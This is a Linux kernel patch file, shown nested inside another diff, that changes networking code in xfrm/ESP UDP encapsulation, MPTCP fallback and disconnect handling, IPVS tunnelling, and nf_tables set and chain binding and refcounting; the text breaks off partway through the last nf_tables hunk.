+diff --git a/net/ipv4/xfrm4_input.c b/net/ipv4/xfrm4_input.c
+index ad2afeef4f106..eac206a290d05 100644
+--- a/net/ipv4/xfrm4_input.c
++++ b/net/ipv4/xfrm4_input.c
+@@ -164,6 +164,7 @@ drop:
+ 	kfree_skb(skb);
+ 	return 0;
+ }
++EXPORT_SYMBOL(xfrm4_udp_encap_rcv);
+ 
+ int xfrm4_rcv(struct sk_buff *skb)
+ {
+diff --git a/net/ipv6/esp6_offload.c b/net/ipv6/esp6_offload.c
+index 242f4295940e6..fc6a5be732634 100644
+--- a/net/ipv6/esp6_offload.c
++++ b/net/ipv6/esp6_offload.c
+@@ -375,6 +375,9 @@ static int esp6_xmit(struct xfrm_state *x, struct sk_buff *skb,  netdev_features
+ 
+ 	secpath_reset(skb);
+ 
++	if (skb_needs_linearize(skb, skb->dev->features) &&
++	    __skb_linearize(skb))
++		return -ENOMEM;
+ 	return 0;
+ }
+ 
+diff --git a/net/ipv6/xfrm6_input.c b/net/ipv6/xfrm6_input.c
+index 04cbeefd89828..4907ab241d6be 100644
+--- a/net/ipv6/xfrm6_input.c
++++ b/net/ipv6/xfrm6_input.c
+@@ -86,6 +86,9 @@ int xfrm6_udp_encap_rcv(struct sock *sk, struct sk_buff *skb)
+ 	__be32 *udpdata32;
+ 	__u16 encap_type = up->encap_type;
+ 
++	if (skb->protocol == htons(ETH_P_IP))
++		return xfrm4_udp_encap_rcv(sk, skb);
++
+ 	/* if this is not encapsulated socket, then just return now */
+ 	if (!encap_type)
+ 		return 1;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 59186997c3e2e..a2c6ce40e4269 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -53,7 +53,7 @@ enum {
+ static struct percpu_counter mptcp_sockets_allocated ____cacheline_aligned_in_smp;
+ 
+ static void __mptcp_destroy_sock(struct sock *sk);
+-static void __mptcp_check_send_data_fin(struct sock *sk);
++static void mptcp_check_send_data_fin(struct sock *sk);
+ 
+ DEFINE_PER_CPU(struct mptcp_delegated_action, mptcp_delegated_actions);
+ static struct net_device mptcp_napi_dev;
+@@ -420,8 +420,7 @@ static bool mptcp_pending_data_fin_ack(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	return !__mptcp_check_fallback(msk) &&
+-	       ((1 << sk->sk_state) &
++	return ((1 << sk->sk_state) &
+ 		(TCPF_FIN_WAIT1 | TCPF_CLOSING | TCPF_LAST_ACK)) &&
+ 	       msk->write_seq == READ_ONCE(msk->snd_una);
+ }
+@@ -579,9 +578,6 @@ static bool mptcp_check_data_fin(struct sock *sk)
+ 	u64 rcv_data_fin_seq;
+ 	bool ret = false;
+ 
+-	if (__mptcp_check_fallback(msk))
+-		return ret;
+-
+ 	/* Need to ack a DATA_FIN received from a peer while this side
+ 	 * of the connection is in ESTABLISHED, FIN_WAIT1, or FIN_WAIT2.
+ 	 * msk->rcv_data_fin was set when parsing the incoming options
+@@ -619,7 +615,8 @@ static bool mptcp_check_data_fin(struct sock *sk)
+ 		}
+ 
+ 		ret = true;
+-		mptcp_send_ack(msk);
++		if (!__mptcp_check_fallback(msk))
++			mptcp_send_ack(msk);
+ 		mptcp_close_wake_up(sk);
+ 	}
+ 	return ret;
+@@ -846,12 +843,12 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 	return true;
+ }
+ 
+-static void __mptcp_flush_join_list(struct sock *sk)
++static void __mptcp_flush_join_list(struct sock *sk, struct list_head *join_list)
+ {
+ 	struct mptcp_subflow_context *tmp, *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	list_for_each_entry_safe(subflow, tmp, &msk->join_list, node) {
++	list_for_each_entry_safe(subflow, tmp, join_list, node) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		bool slow = lock_sock_fast(ssk);
+ 
+@@ -1606,7 +1603,7 @@ out:
+ 	if (!mptcp_timer_pending(sk))
+ 		mptcp_reset_timer(sk);
+ 	if (do_check_data_fin)
+-		__mptcp_check_send_data_fin(sk);
++		mptcp_check_send_data_fin(sk);
+ }
+ 
+ static void __mptcp_subflow_push_pending(struct sock *sk, struct sock *ssk)
+@@ -1708,7 +1705,13 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 		if (ret && ret != -EINPROGRESS && ret != -ERESTARTSYS && ret != -EINTR)
+ 			*copied_syn = 0;
+ 	} else if (ret && ret != -EINPROGRESS) {
+-		mptcp_disconnect(sk, 0);
++		/* The disconnect() op called by tcp_sendmsg_fastopen()/
++		 * __inet_stream_connect() can fail, due to looking check,
++		 * see mptcp_disconnect().
++		 * Attempt it again outside the problematic scope.
++		 */
++		if (!mptcp_disconnect(sk, 0))
++			sk->sk_socket->state = SS_UNCONNECTED;
+ 	}
+ 
+ 	return ret;
+@@ -2375,7 +2378,10 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+-		tcp_disconnect(ssk, 0);
++		/* The MPTCP code never wait on the subflow sockets, TCP-level
++		 * disconnect should never fail
++		 */
++		WARN_ON_ONCE(tcp_disconnect(ssk, 0));
+ 		msk->subflow->state = SS_UNCONNECTED;
+ 		mptcp_subflow_ctx_reset(subflow);
+ 		release_sock(ssk);
+@@ -2656,8 +2662,6 @@ static void mptcp_worker(struct work_struct *work)
+ 	if (unlikely((1 << state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 		goto unlock;
+ 
+-	mptcp_check_data_fin_ack(sk);
+-
+ 	mptcp_check_fastclose(msk);
+ 
+ 	mptcp_pm_nl_work(msk);
+@@ -2665,7 +2669,8 @@ static void mptcp_worker(struct work_struct *work)
+ 	if (test_and_clear_bit(MPTCP_WORK_EOF, &msk->flags))
+ 		mptcp_check_for_eof(msk);
+ 
+-	__mptcp_check_send_data_fin(sk);
++	mptcp_check_send_data_fin(sk);
++	mptcp_check_data_fin_ack(sk);
+ 	mptcp_check_data_fin(sk);
+ 
+ 	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+@@ -2799,13 +2804,19 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 			break;
+ 		fallthrough;
+ 	case TCP_SYN_SENT:
+-		tcp_disconnect(ssk, O_NONBLOCK);
++		WARN_ON_ONCE(tcp_disconnect(ssk, O_NONBLOCK));
+ 		break;
+ 	default:
+ 		if (__mptcp_check_fallback(mptcp_sk(sk))) {
+ 			pr_debug("Fallback");
+ 			ssk->sk_shutdown |= how;
+ 			tcp_shutdown(ssk, how);
++
++			/* simulate the data_fin ack reception to let the state
++			 * machine move forward
++			 */
++			WRITE_ONCE(mptcp_sk(sk)->snd_una, mptcp_sk(sk)->snd_nxt);
++			mptcp_schedule_work(sk);
+ 		} else {
+ 			pr_debug("Sending DATA_FIN on subflow %p", ssk);
+ 			tcp_send_ack(ssk);
+@@ -2845,7 +2856,7 @@ static int mptcp_close_state(struct sock *sk)
+ 	return next & TCP_ACTION_FIN;
+ }
+ 
+-static void __mptcp_check_send_data_fin(struct sock *sk)
++static void mptcp_check_send_data_fin(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+@@ -2863,19 +2874,6 @@ static void __mptcp_check_send_data_fin(struct sock *sk)
+ 
+ 	WRITE_ONCE(msk->snd_nxt, msk->write_seq);
+ 
+-	/* fallback socket will not get data_fin/ack, can move to the next
+-	 * state now
+-	 */
+-	if (__mptcp_check_fallback(msk)) {
+-		WRITE_ONCE(msk->snd_una, msk->write_seq);
+-		if ((1 << sk->sk_state) & (TCPF_CLOSING | TCPF_LAST_ACK)) {
+-			inet_sk_state_store(sk, TCP_CLOSE);
+-			mptcp_close_wake_up(sk);
+-		} else if (sk->sk_state == TCP_FIN_WAIT1) {
+-			inet_sk_state_store(sk, TCP_FIN_WAIT2);
+-		}
+-	}
+-
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *tcp_sk = mptcp_subflow_tcp_sock(subflow);
+ 
+@@ -2895,7 +2893,7 @@ static void __mptcp_wr_shutdown(struct sock *sk)
+ 	WRITE_ONCE(msk->write_seq, msk->write_seq + 1);
+ 	WRITE_ONCE(msk->snd_data_fin_enable, 1);
+ 
+-	__mptcp_check_send_data_fin(sk);
++	mptcp_check_send_data_fin(sk);
+ }
+ 
+ static void __mptcp_destroy_sock(struct sock *sk)
+@@ -3051,13 +3049,18 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
++	/* Deny disconnect if other threads are blocked in sk_wait_event()
++	 * or inet_wait_for_connect().
++	 */
++	if (sk->sk_wait_pending)
++		return -EBUSY;
++
+ 	/* We are on the fastopen error path. We can't call straight into the
+ 	 * subflows cleanup code due to lock nesting (we are already under
+-	 * msk->firstsocket lock). Do nothing and leave the cleanup to the
+-	 * caller.
++	 * msk->firstsocket lock).
+ 	 */
+ 	if (msk->fastopening)
+-		return 0;
++		return -EBUSY;
+ 
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+@@ -3118,6 +3121,7 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 		inet_sk(nsk)->pinet6 = mptcp_inet6_sk(nsk);
+ #endif
+ 
++	nsk->sk_wait_pending = 0;
+ 	__mptcp_init_sock(nsk);
+ 
+ 	msk = mptcp_sk(nsk);
+@@ -3320,9 +3324,14 @@ static void mptcp_release_cb(struct sock *sk)
+ 	for (;;) {
+ 		unsigned long flags = (msk->cb_flags & MPTCP_FLAGS_PROCESS_CTX_NEED) |
+ 				      msk->push_pending;
++		struct list_head join_list;
++
+ 		if (!flags)
+ 			break;
+ 
++		INIT_LIST_HEAD(&join_list);
++		list_splice_init(&msk->join_list, &join_list);
++
+ 		/* the following actions acquire the subflow socket lock
+ 		 *
+ 		 * 1) can't be invoked in atomic scope
+@@ -3333,8 +3342,9 @@ static void mptcp_release_cb(struct sock *sk)
+ 		msk->push_pending = 0;
+ 		msk->cb_flags &= ~flags;
+ 		spin_unlock_bh(&sk->sk_lock.slock);
++
+ 		if (flags & BIT(MPTCP_FLUSH_JOIN_LIST))
+-			__mptcp_flush_join_list(sk);
++			__mptcp_flush_join_list(sk, &join_list);
+ 		if (flags & BIT(MPTCP_PUSH_PENDING))
+ 			__mptcp_push_pending(sk, 0);
+ 		if (flags & BIT(MPTCP_RETRANSMIT))
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 336878f8a222a..047e46dd028dd 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1688,14 +1688,16 @@ static void subflow_state_change(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 	struct sock *parent = subflow->conn;
++	struct mptcp_sock *msk;
+ 
+ 	__subflow_state_change(sk);
+ 
++	msk = mptcp_sk(parent);
+ 	if (subflow_simultaneous_connect(sk)) {
+ 		mptcp_propagate_sndbuf(parent, sk);
+ 		mptcp_do_fallback(sk);
+-		mptcp_rcv_space_init(mptcp_sk(parent), sk);
+-		pr_fallback(mptcp_sk(parent));
++		mptcp_rcv_space_init(msk, sk);
++		pr_fallback(msk);
+ 		subflow->conn_finished = 1;
+ 		mptcp_set_connected(parent);
+ 	}
+@@ -1711,11 +1713,12 @@ static void subflow_state_change(struct sock *sk)
+ 
+ 	subflow_sched_work_if_closed(mptcp_sk(parent), sk);
+ 
+-	if (__mptcp_check_fallback(mptcp_sk(parent)) &&
+-	    !subflow->rx_eof && subflow_is_done(sk)) {
+-		subflow->rx_eof = 1;
+-		mptcp_subflow_eof(parent);
+-	}
++	/* when the fallback subflow closes the rx side, trigger a 'dummy'
++	 * ingress data fin, so that the msk state will follow along
++	 */
++	if (__mptcp_check_fallback(msk) && subflow_is_done(sk) && msk->first == sk &&
++	    mptcp_update_rcv_data_fin(msk, READ_ONCE(msk->ack_seq), true))
++		mptcp_schedule_work(parent);
+ }
+ 
+ void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+diff --git a/net/netfilter/ipvs/ip_vs_xmit.c b/net/netfilter/ipvs/ip_vs_xmit.c
+index 0291713798842..7243079ef3546 100644
+--- a/net/netfilter/ipvs/ip_vs_xmit.c
++++ b/net/netfilter/ipvs/ip_vs_xmit.c
+@@ -1225,6 +1225,7 @@ ip_vs_tunnel_xmit(struct sk_buff *skb, struct ip_vs_conn *cp,
+ 	skb->transport_header = skb->network_header;
+ 
+ 	skb_set_inner_ipproto(skb, next_protocol);
++	skb_set_inner_mac_header(skb, skb_inner_network_offset(skb));
+ 
+ 	if (tun_type == IP_VS_CONN_F_TUNNEL_TYPE_GUE) {
+ 		bool check = false;
+@@ -1373,6 +1374,7 @@ ip_vs_tunnel_xmit_v6(struct sk_buff *skb, struct ip_vs_conn *cp,
+ 	skb->transport_header = skb->network_header;
+ 
+ 	skb_set_inner_ipproto(skb, next_protocol);
++	skb_set_inner_mac_header(skb, skb_inner_network_offset(skb));
+ 
+ 	if (tun_type == IP_VS_CONN_F_TUNNEL_TYPE_GUE) {
+ 		bool check = false;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 13d4913266b4d..7f71bdbc82672 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -153,6 +153,7 @@ static struct nft_trans *nft_trans_alloc_gfp(const struct nft_ctx *ctx,
+ 		return NULL;
+ 
+ 	INIT_LIST_HEAD(&trans->list);
++	INIT_LIST_HEAD(&trans->binding_list);
+ 	trans->msg_type = msg_type;
+ 	trans->ctx	= *ctx;
+ 
+@@ -165,13 +166,20 @@ static struct nft_trans *nft_trans_alloc(const struct nft_ctx *ctx,
+ 	return nft_trans_alloc_gfp(ctx, msg_type, size, GFP_KERNEL);
+ }
+ 
+-static void nft_trans_destroy(struct nft_trans *trans)
++static void nft_trans_list_del(struct nft_trans *trans)
+ {
+ 	list_del(&trans->list);
++	list_del(&trans->binding_list);
++}
++
++static void nft_trans_destroy(struct nft_trans *trans)
++{
++	nft_trans_list_del(trans);
+ 	kfree(trans);
+ }
+ 
+-static void nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set)
++static void __nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set,
++				 bool bind)
+ {
+ 	struct nftables_pernet *nft_net;
+ 	struct net *net = ctx->net;
+@@ -185,16 +193,80 @@ static void nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set)
+ 		switch (trans->msg_type) {
+ 		case NFT_MSG_NEWSET:
+ 			if (nft_trans_set(trans) == set)
+-				nft_trans_set_bound(trans) = true;
++				nft_trans_set_bound(trans) = bind;
+ 			break;
+ 		case NFT_MSG_NEWSETELEM:
+ 			if (nft_trans_elem_set(trans) == set)
+-				nft_trans_elem_set_bound(trans) = true;
++				nft_trans_elem_set_bound(trans) = bind;
++			break;
++		}
++	}
++}
++
++static void nft_set_trans_bind(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	return __nft_set_trans_bind(ctx, set, true);
++}
++
++static void nft_set_trans_unbind(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	return __nft_set_trans_bind(ctx, set, false);
++}
++
++static void __nft_chain_trans_bind(const struct nft_ctx *ctx,
++				   struct nft_chain *chain, bool bind)
++{
++	struct nftables_pernet *nft_net;
++	struct net *net = ctx->net;
++	struct nft_trans *trans;
++
++	if (!nft_chain_binding(chain))
++		return;
++
++	nft_net = nft_pernet(net);
++	list_for_each_entry_reverse(trans, &nft_net->commit_list, list) {
++		switch (trans->msg_type) {
++		case NFT_MSG_NEWCHAIN:
++			if (nft_trans_chain(trans) == chain)
++				nft_trans_chain_bound(trans) = bind;
++			break;
++		case NFT_MSG_NEWRULE:
++			if (trans->ctx.chain == chain)
++				nft_trans_rule_bound(trans) = bind;
+ 			break;
+ 		}
+ 	}
+ }
+ 
++static void nft_chain_trans_bind(const struct nft_ctx *ctx,
++				 struct nft_chain *chain)
++{
++	__nft_chain_trans_bind(ctx, chain, true);
++}
++
++int nf_tables_bind_chain(const struct nft_ctx *ctx, struct nft_chain *chain)
++{
++	if (!nft_chain_binding(chain))
++		return 0;
++
++	if (nft_chain_binding(ctx->chain))
++		return -EOPNOTSUPP;
++
++	if (chain->bound)
++		return -EBUSY;
++
++	chain->bound = true;
++	chain->use++;
++	nft_chain_trans_bind(ctx, chain);
++
++	return 0;
++}
++
++void nf_tables_unbind_chain(const struct nft_ctx *ctx, struct nft_chain *chain)
++{
++	__nft_chain_trans_bind(ctx, chain, false);
++}
++
+ static int nft_netdev_register_hooks(struct net *net,
+ 				     struct list_head *hook_list)
+ {
+@@ -294,6 +366,19 @@ static void nft_trans_commit_list_add_tail(struct net *net, struct nft_trans *tr
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 
++	switch (trans->msg_type) {
++	case NFT_MSG_NEWSET:
++		if (!nft_trans_set_update(trans) &&
++		    nft_set_is_anonymous(nft_trans_set(trans)))
++			list_add_tail(&trans->binding_list, &nft_net->binding_list);
++		break;
++	case NFT_MSG_NEWCHAIN:
++		if (!nft_trans_chain_update(trans) &&
++		    nft_chain_binding(nft_trans_chain(trans)))
++			list_add_tail(&trans->binding_list, &nft_net->binding_list);
++		break;
++	}
++
+ 	list_add_tail(&trans->list, &nft_net->commit_list);
+ }
+ 
+@@ -340,8 +425,9 @@ static struct nft_trans *nft_trans_chain_add(struct nft_ctx *ctx, int msg_type)
+ 				ntohl(nla_get_be32(ctx->nla[NFTA_CHAIN_ID]));
+ 		}
+ 	}
+-
++	nft_trans_chain(trans) = ctx->chain;
+ 	nft_trans_commit_list_add_tail(ctx->net, trans);
++
+ 	return trans;
+ }
+ 
+@@ -359,8 +445,7 @@ static int nft_delchain(struct nft_ctx *ctx)
+ 	return 0;
+ }
+ 
+-static void nft_rule_expr_activate(const struct nft_ctx *ctx,
+-				   struct nft_rule *rule)
++void nft_rule_expr_activate(const struct nft_ctx *ctx, struct nft_rule *rule)
+ {
+ 	struct nft_expr *expr;
+ 
+@@ -373,9 +458,8 @@ static void nft_rule_expr_activate(const struct nft_ctx *ctx,
+ 	}
+ }
+ 
+-static void nft_rule_expr_deactivate(const struct nft_ctx *ctx,
+-				     struct nft_rule *rule,
+-				     enum nft_trans_phase phase)
++void nft_rule_expr_deactivate(const struct nft_ctx *ctx, struct nft_rule *rule,
++			      enum nft_trans_phase phase)
+ {
+ 	struct nft_expr *expr;
+ 
+@@ -497,6 +581,58 @@ static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+ 	return __nft_trans_set_add(ctx, msg_type, set, NULL);
+ }
+ 
++static void nft_setelem_data_deactivate(const struct net *net,
++					const struct nft_set *set,
++					struct nft_set_elem *elem);
++
++static int nft_mapelem_deactivate(const struct nft_ctx *ctx,
++				  struct nft_set *set,
++				  const struct nft_set_iter *iter,
++				  struct nft_set_elem *elem)
++{
++	nft_setelem_data_deactivate(ctx->net, set, elem);
++
++	return 0;
++}
++
++struct nft_set_elem_catchall {
++	struct list_head	list;
++	struct rcu_head		rcu;
++	void			*elem;
++};
++
++static void nft_map_catchall_deactivate(const struct nft_ctx *ctx,
++					struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++
++	list_for_each_entry(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		nft_setelem_data_deactivate(ctx->net, set, &elem);
++		break;
++	}
++}
++
++static void nft_map_deactivate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	struct nft_set_iter iter = {
++		.genmask	= nft_genmask_next(ctx->net),
++		.fn		= nft_mapelem_deactivate,
++	};
++
++	set->ops->walk(ctx, set, &iter);
++	WARN_ON_ONCE(iter.err);
++
++	nft_map_catchall_deactivate(ctx, set);
++}
++
+ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	int err;
+@@ -505,6 +641,9 @@ static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
+ 	if (err < 0)
+ 		return err;
+ 
++	if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++		nft_map_deactivate(ctx, set);
++
+ 	nft_deactivate_next(ctx->net, set);
+ 	ctx->table->use--;
+ 
+@@ -2188,7 +2327,7 @@ static int nft_basechain_init(struct nft_base_chain *basechain, u8 family,
+ 	return 0;
+ }
+ 
+-static int nft_chain_add(struct nft_table *table, struct nft_chain *chain)
++int nft_chain_add(struct nft_table *table, struct nft_chain *chain)
+ {
+ 	int err;
+ 
+@@ -3315,8 +3454,7 @@ err_fill_rule_info:
+ 	return err;
+ }
+ 
+-static void nf_tables_rule_destroy(const struct nft_ctx *ctx,
+-				   struct nft_rule *rule)
++void nf_tables_rule_destroy(const struct nft_ctx *ctx, struct nft_rule *rule)
+ {
+ 	struct nft_expr *expr, *next;
+ 
+@@ -3333,7 +3471,7 @@ static void nf_tables_rule_destroy(const struct nft_ctx *ctx,
+ 	kfree(rule);
+ }
+ 
+-void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *rule)
++static void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *rule)
+ {
+ 	nft_rule_expr_deactivate(ctx, rule, NFT_TRANS_RELEASE);
+ 	nf_tables_rule_destroy(ctx, rule);
+@@ -3421,12 +3559,6 @@ int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
+ 	return 0;
+ }
+ 
+-struct nft_set_elem_catchall {
+-	struct list_head	list;
+-	struct rcu_head		rcu;
+-	void			*elem;
+-};
+-
+ int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	u8 genmask = nft_genmask_next(ctx->net);
+@@ -3669,7 +3801,7 @@ err_destroy_flow_rule:
+ 	if (flow)
+ 		nft_flow_rule_destroy(flow);
+ err_release_rule:
+-	nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE);
++	nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE_ERROR);
+ 	nf_tables_rule_destroy(&ctx, rule);
+ err_release_expr:
+ 	for (i = 0; i < n; i++) {
+@@ -4642,6 +4774,9 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
+ 			return -EOPNOTSUPP;
+ 
++		if (nft_set_is_anonymous(set))
++			return -EOPNOTSUPP;
++
+ 		err = nft_set_expr_alloc(&ctx, set, nla, exprs, &num_exprs, flags);
+ 		if (err < 0)
+ 			return err;
+@@ -4745,7 +4880,7 @@ err_set_expr_alloc:
+ 	for (i = 0; i < set->num_exprs; i++)
+ 		nft_expr_destroy(&ctx, set->exprs[i]);
+ err_set_destroy:
+-	ops->destroy(set);
++	ops->destroy(&ctx, set);
+ err_set_init:
+ 	kfree(set->name);
+ err_set_name:
+@@ -4760,7 +4895,7 @@ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 
+ 	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+ 		list_del_rcu(&catchall->list);
+-		nft_set_elem_destroy(set, catchall->elem, true);
++		nf_tables_set_elem_destroy(ctx, set, catchall->elem);
+ 		kfree_rcu(catchall, rcu);
+ 	}
+ }
+@@ -4775,7 +4910,7 @@ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)
+ 	for (i = 0; i < set->num_exprs; i++)
+ 		nft_expr_destroy(ctx, set->exprs[i]);
+ 
+-	set->ops->destroy(set);
++	set->ops->destroy(ctx, set);
+ 	nft_set_catchall_destroy(ctx, set);
+ 	kfree(set->name);
+ 	kvfree(set);
+@@ -4936,10 +5071,60 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++static void nft_setelem_data_activate(const struct net *net,
++				      const struct nft_set *set,
++				      struct nft_set_elem *elem);
++
++static int nft_mapelem_activate(const struct nft_ctx *ctx,
++				struct nft_set *set,
++				const struct nft_set_iter *iter,
++				struct nft_set_elem *elem)
++{
++	nft_setelem_data_activate(ctx->net, set, elem);
++
++	return 0;
++}
++
++static void nft_map_catchall_activate(const struct nft_ctx *ctx,
++				      struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++
++	list_for_each_entry(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		nft_setelem_data_activate(ctx->net, set, &elem);
++		break;
++	}
++}
++
++static void nft_map_activate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	struct nft_set_iter iter = {
++		.genmask	= nft_genmask_next(ctx->net),
++		.fn		= nft_mapelem_activate,
++	};
++
++	set->ops->walk(ctx, set, &iter);
++	WARN_ON_ONCE(iter.err);
++
++	nft_map_catchall_activate(ctx, set);
++}
++
+ void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+-	if (nft_set_is_anonymous(set))
++	if (nft_set_is_anonymous(set)) {
++		if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++			nft_map_activate(ctx, set);
++
+ 		nft_clear(ctx->net, set);
++	}
+ 
+ 	set->use++;
+ }
+@@ -4950,14 +5135,28 @@ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+-	case NFT_TRANS_PREPARE:
++	case NFT_TRANS_PREPARE_ERROR:
++		nft_set_trans_unbind(ctx, set);
+ 		if (nft_set_is_anonymous(set))
+ 			nft_deactivate_next(ctx->net, set);
+ 
++		set->use--;
++		break;
++	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set)) {
++			if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++				nft_map_deactivate(ctx, set);
++
++			nft_deactivate_next(ctx->net, set);
++		}
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
++		if (nft_set_is_anonymous(set) &&
++		    set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++			nft_map_deactivate(ctx, set);
++
+ 		set->use--;
+ 		fallthrough;
+ 	default:
+@@ -5710,6 +5909,7 @@ static void nft_set_elem_expr_destroy(const struct nft_ctx *ctx,
+ 		__nft_set_elem_expr_destroy(ctx, expr);
+ }
+ 
++/* Drop references and destroy. Called from gc, dynset and abort path. */
+ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ 			  bool destroy_expr)
+ {
+@@ -5731,11 +5931,11 @@ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ }
+ EXPORT_SYMBOL_GPL(nft_set_elem_destroy);
+ 
+-/* Only called from commit path, nft_setelem_data_deactivate() already deals
+- * with the refcounting from the preparation phase.
++/* Destroy element. References have been already dropped in the preparation
++ * path via nft_setelem_data_deactivate().
+  */
+-static void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
+-				       const struct nft_set *set, void *elem)
++void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
++				const struct nft_set *set, void *elem)
+ {
+ 	struct nft_set_ext *ext = nft_set_elem_ext(set, elem);
+ 
+@@ -6368,7 +6568,7 @@ err_elem_free:
+ 	if (obj)
+ 		obj->use--;
+ err_elem_userdata:
+-	nf_tables_set_elem_destroy(ctx, set, elem.priv);
++	nft_set_elem_destroy(set, elem.priv, true);
+ err_parse_data:
+ 	if (nla[NFTA_SET_ELEM_DATA] != NULL)
+ 		nft_data_release(&elem.data.val, desc.type);
+@@ -6413,7 +6613,8 @@ static int nf_tables_newsetelem(struct sk_buff *skb,
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+ 
+-	if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
++	if (!list_empty(&set->bindings) &&
++	    (set->flags & (NFT_SET_CONSTANT | NFT_SET_ANONYMOUS)))
+ 		return -EBUSY;
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -6446,7 +6647,6 @@ static int nf_tables_newsetelem(struct sk_buff *skb,
+ void nft_data_hold(const struct nft_data *data, enum nft_data_types type)
+ {
+ 	struct nft_chain *chain;
+-	struct nft_rule *rule;
+ 
+ 	if (type == NFT_DATA_VERDICT) {
+ 		switch (data->verdict.code) {
+@@ -6454,15 +6654,6 @@ void nft_data_hold(const struct nft_data *data, enum nft_data_types type)
+ 		case NFT_GOTO:
+ 			chain = data->verdict.chain;
+ 			chain->use++;
+-
+-			if (!nft_chain_is_bound(chain))
+-				break;
+-
+-			chain->table->use++;
+-			list_for_each_entry(rule, &chain->rules, list)
+-				chain->use++;
+-
+-			nft_chain_add(chain->table, chain);
+ 			break;
+ 		}
+ 	}
+@@ -6697,7 +6888,9 @@ static int nf_tables_delsetelem(struct sk_buff *skb,
+ 	set = nft_set_lookup(table, nla[NFTA_SET_ELEM_LIST_SET], genmask);
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+-	if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
++
